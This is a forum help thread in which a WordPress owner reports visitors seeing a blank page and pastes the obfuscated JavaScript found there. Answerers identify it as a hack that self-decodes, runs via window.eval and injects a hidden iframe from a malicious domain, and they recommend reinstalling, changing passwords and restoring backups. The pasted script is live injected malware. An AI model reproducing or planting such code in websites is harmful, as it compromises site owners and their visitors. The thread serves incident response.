I have a wordpress site that, for some users, they only see a blank page. In fact, they only get some sort of javascript (below). I’ve tried deactivating all plugins and changing the theme; I still get the same result. I don’t have any compression plugins (like WP-Cache or WP-SuperCache) installed.
What’s the problem, and how do I fix it?
<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-016/7;try{prototype-1;}catch(bawg){e=window["e"+"va"+"l"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,224,327,408,115,216,366,424,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,174,188,47,224,327,408,115,216,366,424,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,125];if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2-1));}e(s);}}</script>
If you’ve disabled all plugins and switched back to the default Twenty Ten (or Twenty Eleven) theme and are still seeing this, then you’ve got a serious problem.
First of all, the JavaScript is horribly obfuscated. Second of all, with no plugins and a default theme, you should see the default layout of WordPress.
From the looks of things, someone has probably hacked your site.
I recommend you:
Update
I did some reverse-engineering on that JavaScript you linked to, and you have been hacked. It’s a compression script that uncompresses itself and calls
window.eval()to execute its package.The code adds a hidden iframe that loads content from a bad domain into your site. I’m not going to post the full details of the hack here, but it’s pretty bad.
In addition to reinstalling WordPress, I also highly recommend you change all of your server passwords:
You might also want to work with a company like Sucuri – they specialize in malware protection and removal.
Given what you’ve described the hack is probably in the index.php in your html root, or in your database stored in your pages or maybe even as an option.. You’re going to need to have it cleaned by someone who knows what to look for. A number of us are in that industry.
Attacks are getting to be more creative. The most innovative one I’ve seen added a harmless looking line that in the end executed the content of an option which included a plugin named Hello Dolly but contained malware. There’s some fun stuff out there now and it is not always easy to find it all.
As the codex article says, the quickest, surest way to clean things up is to delete the files, directories and databases and restore from a backup before you had the problem. A manual cleanup takes longer, costs more and is less certain to catch the problem, but if you don’t have a recent backup, sometimes it is the only thing to do.